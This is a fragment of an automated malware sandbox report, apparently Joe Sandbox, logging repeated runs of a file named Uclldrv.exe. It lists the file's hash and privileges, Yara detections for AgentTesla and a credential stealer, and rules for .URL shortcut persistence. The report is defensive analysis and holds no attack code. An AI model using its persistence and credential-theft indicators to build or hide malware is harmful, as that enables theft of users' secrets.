                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.467456643.0000000002154000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.473405683.00000000035D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            Reputation:low

                                                                                                            General

                                                                                                            Start time:21:01:48
                                                                                                            Start date:21/11/2020
                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:'C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe'
                                                                                                            Imagebase:0x400000
                                                                                                            File size:881008 bytes
                                                                                                            MD5 hash:947EDEB169369AC67C5448CC2F8104A3
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:Borland Delphi
                                                                                                            Yara matches:
                                                                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000D.00000002.362836092.0000000002AC7000.00000020.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                                            • Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000D.00000002.362836092.0000000002AC7000.00000020.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 23%, ReversingLabs
                                                                                                            Reputation:low

                                                                                                            General

                                                                                                            Start time:21:01:56
                                                                                                            Start date:21/11/2020
                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:'C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe'
                                                                                                            Imagebase:0x400000
                                                                                                            File size:881008 bytes
                                                                                                            MD5 hash:947EDEB169369AC67C5448CC2F8104A3
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:Borland Delphi
                                                                                                            Reputation:low

                                                                                                            General

                                                                                                            Start time:21:02:11
                                                                                                            Start date:21/11/2020
                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
                                                                                                            Imagebase:0x400000
                                                                                                            File size:881008 bytes
                                                                                                            MD5 hash:947EDEB169369AC67C5448CC2F8104A3
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.469055192.00000000025F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000003.358872577.0000000000852000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.474318013.00000000036C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.468146329.00000000021D4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.477297812.0000000004F00000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            Reputation:low

                                                                                                            Disassembly

                                                                                                            Code Analysis

                                                                                                            Reset < >